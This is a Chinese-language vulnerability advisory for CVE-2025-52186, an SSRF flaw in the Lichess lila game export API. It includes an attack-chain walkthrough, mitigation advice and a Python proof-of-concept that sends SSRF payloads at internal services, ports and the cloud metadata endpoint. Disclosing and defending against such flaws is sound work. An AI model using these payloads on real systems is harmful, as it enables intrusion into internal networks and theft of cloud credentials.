CVE-2025-52186 CVSS 6.5 中危

CVE-2025-52186: Lichess lila game export API SSRF漏洞

披露日期: 2025-11-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-52186

漏洞类型

服务器端请求伪造(SSRF)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Lichess lila

漏洞概述

CVE-2025-52186是Lichess开源国际象棋平台lila中的一个服务器端请求伪造(SSRF)安全漏洞。该漏洞存在于game export API功能中，攻击者可以通过构造特殊的players参数值，诱导服务器向任意URL发送HTTP请求。由于漏洞出现在2025年6月2日之前的版本中，攻击者可以利用此漏洞进行内网探测、读取内部服务数据或对第三方服务发起攻击。此漏洞无需认证即可利用，且不需要用户交互，这大大增加了其潜在危害性。Lichess是一个流行的开源在线国际象棋平台，因此该漏洞可能影响大量用户和游戏数据。

技术细节

该SSRF漏洞位于lila的game export API接口中。问题出在players参数的验证缺失：当用户请求游戏导出功能时，players参数的值被直接传递给内部HTTP客户端而未经任何安全过滤或验证。攻击者可以通过在players参数中注入内网IP地址（如192.168.x.x、10.x.x.x）、localhost或其他敏感服务地址（如localhost:6379用于Redis连接），使服务器发起对这些地址的HTTP请求。由于lila服务器通常部署在具有内网访问权限的环境中，攻击者可能借此探测内网服务、读取敏感数据或利用内部服务的信任关系进行进一步攻击。攻击者还可以指定外部恶意服务器地址，将服务器作为代理使用。

攻击链分析

STEP 1

步骤1

攻击者识别目标Lichess lila服务器的game export API端点

STEP 2

步骤2

攻击者构造包含恶意URL的players参数，如内网IP或localhost

STEP 3

步骤3

攻击者发送带有恶意参数的HTTP请求到/api/game/export/{gameId}端点

STEP 4

步骤4

服务器端lila应用接收请求，将players参数值直接传递给内部HTTP客户端

STEP 5

步骤5

服务器向攻击者指定的URL发起HTTP请求，执行SSRF攻击

STEP 6

步骤6

攻击者获取内网服务响应数据，实现内网探测、数据读取或作为代理攻击第三方

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-52186 SSRF PoC
import requests

target = "http://target-lichess-server/api/game/export/12345"

# SSRF payload targeting internal Redis service
ssrf_payloads = [
    # Probe internal services
    "http://127.0.0.1:6379/",
    "http://192.168.1.1:8080/admin",
    "http://10.0.0.1:9200/_cat/indices",
    # Port scanning via SSRF
    "http://127.0.0.1:22/",
    "http://127.0.0.1:3306/",
    # Read internal metadata
    "http://169.254.169.254/latest/meta-data/",
]

for payload in ssrf_payloads:
    params = {"players": payload}
    try:
        response = requests.get(target, params=params, timeout=10)
        print(f"Payload: {payload}")
        print(f"Status: {response.status_code}")
        print(f"Response: {response.text[:200]}")
        print("---")
    except requests.exceptions.RequestException as e:
        print(f"Error with {payload}: {e}")

影响范围

Lichess lila < commit 11b4c0fb00f0ffd823246f839627005459c8f05c (2025-06-02)

防御指南

临时缓解措施

如果无法立即升级，可通过配置Web应用防火墙规则临时拦截包含内网IP或特殊端口的players参数请求，同时启用网络层访问控制限制服务器出站流量到必要的目的地址。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表